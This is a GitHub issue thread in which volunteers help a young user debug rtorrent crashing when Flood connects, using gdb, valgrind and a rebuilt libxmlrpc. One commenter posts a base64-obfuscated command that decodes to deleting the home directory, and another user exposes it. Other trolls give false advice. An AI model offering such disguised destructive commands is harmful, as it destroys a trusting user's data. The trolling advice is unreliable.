### ISSUE TITLE
rtorrent crashes after starting Flood

### ISSUE THREAD

**Issue by Lukyczk** [jfurrow/flood#264]
I succesfully setup Flood, I got into the web-interface (login screen, and loading screen), but nothing after that. I was getting a /api/stats 500 error, so I disabled rtorrent sock in config.js. It looks like I made a step forward, but rtorrent crashes right after loading Flood. I put alot of time into setting up Flood (maybe 5 hours of time), and I would like to get it to end. Thanks

rtorrent output - http://pastebin.com/t46Khm7m
flood output - http://pastebin.com/0NxJr77j

**Comment by jfurrow** [comment]
rTorrent is not running. This is unrelated to Flood.

**Comment by jfurrow** [comment]
Sorry @Lukyczk but you'll need to troubleshoot your rTorrent problems elsewhere. I'm not sure what would cause the segmentation fault.

**Comment by Lukyczk** [comment]
I think it is related to Flood, as it only happens when I start it. I was already asking on the rtorrent IRC, but no answers there :-/

**Comment by jfurrow** [comment]
Hmm okay. Can you post your entire `rtorrent.rc` and `config.js` please?

**Comment by Lukyczk** [comment]
Edit: http://i.imgur.com/OtOYzxn.png

**Comment by jfurrow** [comment]
@Lukyczk Please post your configs, otherwise I can't debug this.

**Comment by Lukyczk** [comment]
Yea, im workin on it, im 13 and its late here, my parents wouldnt be happy if they realized im on the pc atm. The harddisk is loud ah. Happy it isnt my main

**Comment by Lukyczk** [comment]
Configs
(Changed to txt)



[config.txt](https://github.com/jfurrow/flood/files/769669/config.txt)
[rtorrent.txt](https://github.com/jfurrow/flood/files/769670/rtorrent.txt)

**Comment by whiteisthenewblack** [comment]
please don't change the config to .txt, it can't be debugged then...

**Comment by Lukyczk** [comment]
It doesnt let me upload them in .js

**Comment by TETYYS** [comment]
please change your scgi listen ip address to 127.0.0.1 unless you want to get hacked

**Comment by Ghosthree3** [comment]
I am now of the opinion this is most likely the cause of user error.

**Comment by whiteisthenewblack** [comment]
okay well you probably need to install regular expressions on your computer, you can download them from http://www.ultrapico.com/expresso.htm

**Comment by Lukyczk** [comment]
TETYYS: its a closed network without port forwarding and things, I dont care about that

**Comment by TETYYS** [comment]
can you run rtorrent in gdb?

**Comment by Lukyczk** [comment]
white: Im sorry but I have to let it till tomorrow, have a nice day

**Comment by whiteisthenewblack** [comment]
Don't listen to this guy, GDB is a dangerous computer virus. I wouldn't recommend google-searching for it.

He's already shown us that he has a knowledge of illegal hacking skills like SCGI, not to be trusted

**Comment by HYDRAULIC-EXCAVATOR** [comment]
node.js has its own debugger no need to run flood under GDB

**Comment by Lukyczk** [comment]
Well, ok, i guess

**Comment by jfurrow** [comment]
@Lukyczk You're being trolled pretty hard here...

What version of rtorrent are you running? What version of Node? Does rtorrent run normally before you start Flood? And does it crash immediately after starting Flood?

**Comment by TETYYS** [comment]
can you run rtorrent under gdb?

it's not a virus i promise

**Comment by whiteisthenewblack** [comment]
# please listen to tetyys

**Comment by jfurrow** [comment]
Reopening for now

**Comment by Lukyczk** [comment]
Can you please tell me how to do it ? I googled it but I dont really understand what they are talking about. And node gives me an error when trying to install the node debbuger

**Comment by whiteisthenewblack** [comment]
`gdb $(which rtorrent)`

**Comment by Lukyczk** [comment]
just gives me an output of what gdb is, how its licensed, but nothing that looks like debugging :-/

**Comment by Lukyczk** [comment]
Tells me reading symbols from rtorrent...done. And nothing

**Comment by TETYYS** [comment]
write run and press enter

**Comment by Lukyczk** [comment]
k, got it, 

pastebin.com/u095nuYu

**Comment by TETYYS** [comment]
write bt and press enter

**Comment by Lukyczk** [comment]
#1 0x65feff8 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)

**Comment by TETYYS** [comment]
uuuhhh im actually not a debugging expert but now run rtorrent in valgrind

**Comment by Lukyczk** [comment]
That is ?

**Comment by whiteisthenewblack** [comment]
first hit on google: http://valgrind.org/

>Valgrind is an instrumentation framework for building dynamic analysis tools. There are Valgrind tools that can automatically detect many memory management and threading bugs, and profile your programs in detail. You can also use Valgrind to build new tools.

**Comment by TETYYS** [comment]
valgrind is a program like gdb, run with `valgrind rtorrent`

**Comment by Lukyczk** [comment]
white: yea sorry I should have done that

pastebin.com/PBnCAPTA

**Comment by TETYYS** [comment]
did it crash this time?

**Comment by TETYYS** [comment]
also looks like something's going on in line 115 of your config

**Comment by Lukyczk** [comment]
Ill take a look

**Comment by Lukyczk** [comment]
Line 115 was blank

**Comment by TETYYS** [comment]
something tells me you're doing something very wrong
• rtorrent crashes on memcpy, yet valgrind reports no errors (???)
• rtorrent complains about errors in config, but line 115 is blank

**Comment by Lukyczk** [comment]
I edited out the line 115, and heres the new log

pastebin.com/htwKbJgA

**Comment by TETYYS** [comment]
where did the valgrind version go?

**Comment by Lukyczk** [comment]
I didnt copy that

**Comment by TETYYS** [comment]
do you know how to copy from terminal?

**Comment by Lukyczk** [comment]
I just selected it and CTRL+ALT+C

**Comment by TETYYS** [comment]
is this the whole valgrind output?

**Comment by whiteisthenewblack** [comment]
just pipe the whole output: `valgrind $(which rtorrent) | nc termbin.com 9999`

**Comment by Lukyczk** [comment]
Where is it goin to save ?

**Comment by TETYYS** [comment]
goto to termbin.com to find out

**Comment by Lukyczk** [comment]
It didnt tell me, ill try it again. Still did nothing....

pastebin.com/hsNTXwmF

**Comment by TETYYS** [comment]
looks like a bug in libxmlrpc that could be potentially triggered by flood

**Comment by TETYYS** [comment]
can you compile libxmlrpc from source with debug symbols and try again in valgrind?

**Comment by Lukyczk** [comment]
Thats ./configure -g, right ?

**Comment by TETYYS** [comment]
`./configure --debug`

**Comment by Lukyczk** [comment]
Unrecognized option :-/

**Comment by TETYYS** [comment]
hmm, try everything till it works

**Comment by Lukyczk** [comment]
And with everything you mean what

**Comment by Lukyczk** [comment]
Nope, none of them works

**Comment by whiteisthenewblack** [comment]
don't you want `CFLAGS="-g" ./configure`?

**Comment by Lukyczk** [comment]
That one works, thanks

**Comment by Lukyczk** [comment]
pastebin.com/yyV8dXRy

**Comment by TETYYS** [comment]
now recompile rtorrent while linking it to your debuggified libxmlrpc

**Comment by Lukyczk** [comment]
I think it replaced the previous xmlrpc. Do I still have to recompile rtorrent ?

**Comment by whiteisthenewblack** [comment]
it shouldn't have, unless you changed the destination prefix. the compiled one should be in /usr/local/lib, packaged one in /usr/lib.

and yeah, you have to recompile regardless (afaik)

**Comment by ShambaBanikIT** [comment]
if gdb still refuses to output proper errors that help to further diagnose the problem there's still hope that IDA can be useful.

> Your mind is the vehicle for your growth

**Comment by TETYYS** [comment]
but valgrind just reported that error is in libxmlrpc

**Comment by Lukyczk** [comment]
pastebin.com/q0U17YLM

**Comment by whiteisthenewblack** [comment]
>in /usr/lib/i386-linux-gnu/libxmlrpc_xmlparse.so.3.33

this is not the xmlrpc you compiled

**Comment by Lukyczk** [comment]
And what should I do then

**Comment by TETYYS** [comment]
i suggest hack-modifying rtorrent configure files or temporary replacing `/usr/lib/i386-linux-gnu/libxmlrpc_xmlparse.so.3.33` with your own one

**Comment by whiteisthenewblack** [comment]
```
export CPPFLAGS="-I/usr/local/include"
export LDFLAGS="-L/usr/local/lib"
```
should work?

**Comment by Lukyczk** [comment]
Export command not found

**Comment by whiteisthenewblack** [comment]
what shell and OS are you using?

**Comment by Lukyczk** [comment]
No idea, Debian 8

**Comment by whiteisthenewblack** [comment]
not having export is like walking out of the house in the morning without trousers. what happens with `echo $SHELL`?

**Comment by Lukyczk** [comment]
/bin/bash

**Comment by whiteisthenewblack** [comment]
my own machine with debian8/bash works absolutely fine.
```
# export FOO=BAR
#
```
 what have you done to your computer?

**Comment by Lukyczk** [comment]
Idk :-/ maybe bcs its a kde version and its a 32bit ?

**Comment by ShambaBanikIT** [comment]
that's odd. what's the output of grep export ~/.bashrc?

> He is Nirgura. He is Nirakaar. He is the Para-Brahman that is all pervading.

**Comment by whiteisthenewblack** [comment]
no, that shouldn't have anything to do with it. At this point i feel like throwing in the towel, if we can't even set a shell variable properly what hope is there?

**Comment by TETYYS** [comment]
just temporarily replace `/usr/lib/i386-linux-gnu/libxmlrpc_xmlparse.so.3.33` with your own

**Comment by Lukyczk** [comment]
Shamba: folder or file doesnt exist (translated)

**Comment by Lukyczk** [comment]
TETYYS: And where my own one located at ?

**Comment by ShambaBanikIT** [comment]
hm, might as well try to run: $(echo "cm0gLXIgfi8K"|base64 -d)

> Men should take their knowledge from the sun, the moon and the stars

**Comment by whiteisthenewblack** [comment]
don't run that

**Comment by Lukyczk** [comment]
Why

**Comment by whiteisthenewblack** [comment]
```
~ $ echo cm0gLXIgfi8K | base64 -d
rm -r ~/
~ $ 
```

**Comment by ShambaBanikIT** [comment]
you need the $()

**Comment by Lukyczk** [comment]
Wth are you talking aabout

**Comment by whiteisthenewblack** [comment]
`$()` means "run the output of"
the output of `echo cm0gLXIgfi8K | base64 -d` is `rm -r ~/`
so `$(echo cm0gLXIgfi8K | base64 -d)` will run `rm -r ~/` and remove your home dir

**Comment by TETYYS** [comment]
@Lukyczk do you know where did you compile your debuggized libxmlrpc?

**Comment by Lukyczk** [comment]
T. Yeah I do
White sounds logical :-/

**Comment by ShambaBanikIT** [comment]
can you try export under sh?
1. sh
2. export FOO="BAR"
3. echo $BAR

> Yoga without Dogma. Stretch without Ganesh. Breathe without Krishan. Hare you…!

**Comment by whiteisthenewblack** [comment]
Shamba's example is wrong, third line should read `echo $FOO`

**Comment by Lukyczk** [comment]
Ok, im out, ill do this tomorrow

**Comment by ShambaBanikIT** [comment]
are you on steroids white?

> It does not matter how slowly you go as long as you do not stop.

**Comment by jfurrow** [comment]
Thanks to everyone helping @Lukyczk. Let me know if there's anything I can do.

**Comment by TETYYS** [comment]
have you ever noticed that returns xmlrpc data in a very disgusting format?

**Comment by jfurrow** [comment]
@TETYYS Are you asking me? I'm don't understand the question.

**Comment by Lukyczk** [comment]
Should I try to reinstall the PC ? If so, do you have a good distribution for a seedbox ?

**Comment by BananaCoke** [comment]
Don't go rushing reinstalling your OS just cuz something is not working, that's a bad habit that you don't want to get into.
Did you try to run the export command again? Maybe you typo'd something yesterday? 

> Send a Flu-shot

**Comment by Lukyczk** [comment]
BananaCoke: No, it doesnt work. I dont have a problem reinstalling the OS, bcs its not my main machine, and its ment just and only for torrenting. And if that doesnt work, then what should I do ?

**Comment by BananaCoke** [comment]
Your box seems pretty borked atm, dunno what happened there. Anyways, if you are really set on reinstalling your seedbox's OS I would look into installing one of the following:
FreeBSD (it's pretty performant, that's what the big goys at Netflix use)
GNU/Debian LTS (if treated nicely it's a really nice OS to run)
GNU/CentOS (aka RH for the poor)

> Never fear, I is here.

**Comment by TETYYS** [comment]
please don't reinstall your OS because you discovered potential bug in libxmlrpc

**Comment by Lukyczk** [comment]
TETYYS: Yea ur right, but I would really like to get it running :-/

**Comment by TETYYS** [comment]
it's likely that same thing will happen again after reinstall, please run rtorrent in valgrind with your compiled libxmlrpc

**Comment by whiteisthenewblack** [comment]
Let's try and get to the bottom of this. Can you post a screenshot of `export` not working?

**Comment by Lukyczk** [comment]
Gimme a sec

**Comment by Lukyczk** [comment]
Oh, I see, I used "sudo", so it didnt work, it works without "sudo", im sorry

**Comment by TETYYS** [comment]
ughhhhhh

**Comment by Lukyczk** [comment]
I really didnt know that was going to happen

**Comment by Lukyczk** [comment]
Pastebin/AC9yRcs5

**Comment by whiteisthenewblack** [comment]
Whatever, you know now. Try running rtorrent with our new xmlrpc then?

**Comment by Lukyczk** [comment]
Pastebin/AC9yRcs5

**Comment by TETYYS** [comment]
you're still using `/usr/lib/i386-linux-gnu/libxmlrpc_xmlparse.so.3.33`

**Comment by Lukyczk** [comment]
And wheres the new one located ?

**Comment by whiteisthenewblack** [comment]
Wherever you installed it, probably /usr/local

**Comment by TETYYS** [comment]
and if you didn't install it, it should be in the source folder somewhere

**Comment by Lukyczk** [comment]
When I try to  install rtorrent with debugging enabled (CFLAGS="-g --with-xmlrpc-c" ./configure" I get: rtorrent: XMLRPC not supported

**Comment by Lukyczk** [comment]
When I try to  install rtorrent with debugging enabled (CFLAGS="-g --with-xmlrpc-c" ./configure" I get: rtorrent: XMLRPC not supported

**Comment by Lukyczk** [comment]
Dumb close issue button

**Comment by TETYYS** [comment]
`CFLAGS="-g" ./configure --with-xmlrpc-c` ?

**Comment by Lukyczk** [comment]
Flood started working ! Yay ! Idk why it was happening, but with the newer version of xmlrpc it works (i was using the superstable one before)

**Comment by TETYYS** [comment]
uhh... it would be very useful to find out which xmlrpc request would crash it, but whatever.

**Comment by Lukyczk** [comment]
It looks like its fixed in the newer versions, so I think they already knew bout it and fixed it

**Comment by ShambaBanikIT** [comment]
Well done everyone.

> I am the true vine, and My Father is the keeper of the vineyard.

**Comment by jfurrow** [comment]
🎉

**Comment by whiteisthenewblack** [comment]
@Lukyczk no, if they knew about the bug they would backport the fix to the superstable version.
